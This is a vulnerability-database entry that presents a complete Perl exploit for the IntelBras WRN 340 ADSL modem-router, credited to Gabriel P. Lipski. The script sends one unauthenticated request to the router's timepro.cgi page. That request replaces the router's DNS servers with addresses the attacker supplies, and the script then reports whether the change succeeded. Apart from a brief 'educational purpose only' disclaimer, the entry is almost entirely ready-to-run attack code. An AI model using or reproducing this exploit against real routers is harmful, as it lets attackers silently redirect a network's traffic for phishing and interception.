ID

VAR-E-201509-0396

TITLE

IntelBras WRN 340 Unauthenticated Remote DNS Changer

DESCRIPTION

IntelBras WRN 340 (ADSL modem router) remote unauthenticated DNS changing exploit.

AFFECTED PRODUCTS

EXPLOIT

#!/usr/bin/perl
#
# IntelBras WRN 340 (ADSL Modem-Router) - Unauthenticated Remote DNS Change Exploit
#
# Discovered by:
#
# Gabriel P. Lipski - gp[DOT]lipski[AT]gmail[DOT]com
#
# Brazil, sept. 2015.
#
#
# AVISO:
#
# Este codigo foi feito apenas para fins educacionais.
# NAO USE SEM A PERMISSAO DO DONO DA REDE-ALVO.
# Use por sua conta e risco!
#
#
# WARNING:
#
# This program is for educational purpose only.
# DO NOT USE IT WITHOUT PERMISSION OF TARGET-NETWORK OWNER.
# Use at your own risk!

use LWP::UserAgent;
use HTTP::Request;

if($#ARGV < 2){
print "IntelBras WRN 340 (ADSL Modem-Router) - Unauthenticated Remote DNS Change Exploit\n";
print "Usage: ./$0 <ip> <dns-1> <dns-2>\n";
exit;
}

if($ARGV[1] =~ /(.+)\.(.+)\.(.+)\.(.+)/){ $DNS1 = $1; $DNS2 = $2; $DNS3 = $3; $DNS4 = $4; }

if($ARGV[2] =~ /(.+)\.(.+)\.(.+)\.(.+)/){ $DNS5 = $1; $DNS6 = $2; $DNS7 = $3; $DNS8 = $4; }

$sock = new LWP::UserAgent;
$sock->timeout(5);
$http = new HTTP::Request GET => "http://".$ARGV[0]."/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=".$DNS1."&fdns_dynamic2=".$DNS2."&fdns_dynamic3=".$DNS3."&fdns_dynamic4=".$DNS4."&sdns_dynamic1=".$DNS5."&sdns_dynamic2=".$DNS6."&sdns_dynamic3=".$DNS7."&sdns_dynamic4=".$DNS8."&userid=&passwd=&mtu=1454&ip1=192&ip2=168&ip3=254&ip4=2&sm1=255&sm2=255&sm3=255&sm4=0&gw1=192&gw2=168&gw3=254&gw4=254&fdns1=&fdns2=&fdns3=&fdns4=&sdns1=&sdns2=&sdns3=&sdns4=&static_mtu=1500";
$response = $sock->request($http);

if($response->content =~ /Definir Servidor DNS Manualmente/){
print "Successfully exploited!\n";
}

else {
print "Unknown error.\n";
}

EXPLOIT HASH

PRICE

free

TAGS

CREDITS

Gabriel P. Lipski

EXTERNAL IDS

SOURCES

LAST UPDATE DATE

2022-07-27T09:51:53.987000+00:00

SOURCES RELEASE DATE